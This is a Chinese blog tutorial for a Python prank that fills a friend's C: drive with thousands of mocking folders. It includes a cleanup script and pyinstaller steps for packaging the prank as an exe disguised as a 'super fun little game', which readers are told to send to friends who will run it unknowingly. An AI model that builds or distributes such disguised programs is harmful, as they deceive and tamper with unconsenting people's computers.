分享

Python|恶搞C盘

 算法与编程之美 2020-09-29

1 前言

2 准备

这次的恶搞小程序,为python语言编写,除了几个内置模块以外,还有一个用于打包py文件的模块--pyinstaller。安装方式为:在命令行输入以下命令:

pip install pyinstaller

需要的模块准备好后,直接导入使用。

3 创建代码

import os,sys,random#导入模块

def spoofCeate():

    textList = ['哈哈','上当了','有意思吗','你删得完吗','还是放弃吧','笑死我了','哈哈哈哈哈','可不要乱删哦',

                '小心别把自己的文件夹删了哦']#生成文件的名字

    path = 'C:\\'#C盘路径

    for i in range(65,91):

        for o in range(100):

            text = random.choice(textList)

            fileName = path+chr(i)+str(o)+text #采用26个大写字母和0-100的数字,随机生成的文本来命名

            if not os.path.exists(fileName):

                os.mkdir(fileName)

    for i in range(97,122):

        for o in range(100):

            text = random.choice(textList)

            fileName = path+chr(i)+str(o)+text #采用26个小写字母和0-100的数字,随机生成的文本来命名

            if not os.path.exists(fileName):

                os.mkdir(fileName)

spoofCeate()

运行这些代码后,会在运行电脑的C盘里面创建很多个文件夹,文件夹的名字为26个大小字母+0-100的数字+随机选取的文本。之要你将这个代码发给朋友,他以运行,就会神不知鬼不觉的在C盘下创建(24+24*100个文件夹,等他哪天发现了,他也不知道是你干的,所以想想就很刺激。

图3.1运行效果

4 删除代码

因为友谊第一,所以为了不让友谊的小船翻掉,小编又写了一个删掉创建的所有文件夹的程序。代码如下:

import os,sys#导入模块

def spoofDelete():

    textList = ['哈哈','上当了','有意思吗','你删得完吗','还是放弃吧','笑死我了','哈哈哈哈哈','可不要乱删哦',

                '小心别把自己的文件夹删了哦'] #文件夹的名字

    path = 'C:\\' #C盘路径

    for i in os.listdir(path):

        pathNow = os.path.join(path,i)

        for o in textList:

            if o in i:

                print(pathNow)

                os.rmdir(pathNow) #删除含有给定关键字的文件夹

                break

spoofDelete()

5 打包程序

因为有很多朋友电脑上没有python环境,所以将代码发给他,他也运行不了,于是小编又用python的第三方库pyinstaller将代码打包了。由于这次打包只需要将纯代码文件打包,所以直接使用以下命令就行了。

pyinstaller -F 超有趣的小游戏.py

pyinsatller -F 恢复.py

具体详细的打包方式请看本公众号内小编专门介绍pyinstaller的两篇文章:

《python文件打包之战之基础篇》、

python文件打包实战之进阶篇》。

最后打包成exe文件后,就可以直接发给朋友啦。

图5.1打包成功


END

编  辑   |   王文星

   责  编   |   八里公路

能力越强,责任越大。实事求是,严谨细致。    

                                                  ——where2go 团队


微信号:算法与编程之美          

    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多